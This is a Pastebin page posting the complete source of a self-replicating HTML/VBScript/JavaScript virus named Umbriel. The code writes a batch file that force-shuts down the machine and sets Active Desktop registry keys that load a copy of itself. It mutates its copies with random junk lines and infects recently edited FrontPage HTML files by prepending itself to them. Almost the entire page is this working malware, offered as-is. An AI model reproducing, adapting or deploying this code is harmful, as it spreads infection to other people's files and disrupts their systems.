Advertisement
FlyFar

Virus.HTML.Fpumb - Source Code

Jun 26th, 2023
799
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 3.38 KB | Cybersecurity | 0 0
  1. <html><!--Umbriel-->
  2. <head>
  3. <title> Second Part To Hell's HTML.Umbriel </title>
  4. </head>
  5. <body>
  6. <script language="VBScript">
  7. rem VBS
  8. On Error Resume Next
  9. Dim fso, shell, wrte, tempdir, windir, rand, file
  10. Set fso=CreateObject("Scripting.FileSystemObject")
  11. Set shell=CreateObject("Wscript.Shell")
  12. if err.number=429 Then
  13.   shell.Run javascript:location.reload()
  14. End If
  15.  
  16. Set windir=fso.GetSpecialFolder(0)
  17. Set tempdir=fso.GetSpecialFolder(2)
  18.  
  19. Set wrte=fso.CreateTextFile(windir+"\windows.cmd")
  20. wrte.WriteLine "cls"
  21. wrte.WriteLine "@echo off"
  22. wrte.WriteLine "shutdown -s -f -t 300 -c "+chr(34)+"Second Part To Hell's Umbriel has you..."+chr(34)
  23. wrte.Close()
  24.  
  25. shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1\Source", "C:\umbriel.html"
  26. shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1\SubscribedURL", "C:\umbriel.html"
  27.  
  28. Randomize
  29. rand=int(rnd*5)+1
  30. If rand=1 then
  31.   shell.Run windir+"\windows.cmd"
  32. End If
  33. </script>
  34.  
  35. <script language="JavaScript">
  36. // JS
  37. var viruspath, virus, code, fso, file, check, checka, checkb
  38. fso=new ActiveXObject("Scripting.FileSystemObject")
  39. viruspath=window.location.pathname
  40. viruspath=viruspath.slice(1)
  41. virus=fso.OpenTextFile(viruspath,1)
  42. file=fso.CreateTextFile("C:\\umbriel.html")
  43. for (i=0; i<500; i++)
  44. {
  45.  if (checkb!=1)
  46.  {
  47.    if (Math.round(Math.random()*5)+1 == 3)
  48.    {
  49.      if (check == 2)
  50.      {
  51.        file.WriteLine("/"+"*")
  52.        file.WriteLine("*"+"/")
  53.      }
  54.      if (check == 3)
  55.      {
  56.        file.WriteLine("rem")
  57.      }
  58.    }
  59.    code=virus.ReadLine()
  60.    if (code == "/"+"*") { checka=666 }
  61.    if (code == "*"+"/") { checka=666 }
  62.    if (code == "rem") { checka=666 }
  63.    if (checka != 666 ) { file.WriteLine(code) }
  64.    checka=0
  65.    if (code=="</"+unescape("%68")+"tml>") { checkb=1 }
  66.     if (code=="// JS") { check=2 }
  67.     if (code=="rem VBS") { check=3 }
  68.     if (code=="</"+unescape("%73")+"cript>") { check=0 }
  69.   }
  70. }
  71. virus.Close();
  72. file.Close();
  73. </script>
  74.  
  75. <script language="VBScript">
  76. rem VBS
  77. On Error Resume Next
  78. set fso=CreateObject("Scripting.FileSystemObject")
  79. set shell=CreateObject("WScript.Shell")
  80. set myfile=fso.OpenTextFile("C:\umbriel.html")
  81. mycode=myfile.ReadAll
  82. myfile.Close()
  83. rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File1")
  84. if rr <> "" Then Call Umbriel(rr, mycode)
  85. rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File2")
  86. if rr <> "" Then Call Umbriel(rr, mycode)
  87. rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File3")
  88. if rr <> "" Then Call Umbriel(rr, mycode)
  89. rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File4")
  90. if rr <> "" Then Call Umbriel(rr, mycode)
  91. rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File5")
  92. if rr <> "" Then Call Umbriel(rr, mycode)
  93.  
  94. Sub Umbriel(rr, mycode)
  95. set victim=fso.OpenTextFile(rr)
  96. infcheck=victim.ReadLine
  97. If infcheck<>"<html><!--Umbriel-->" Then
  98.   viccode=victim.ReadAll
  99.   victim.Close()
  100.   set wrtevic=fso.OpenTextFile(rr, 2, false, 0)
  101.   wrtevic.Write (mycode+infcheck+chr(13)+chr(10)+viccode)
  102.   wrtevic.Close
  103. End If
  104.  
  105. End Sub
  106. </script>
  107. </body>
  108. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement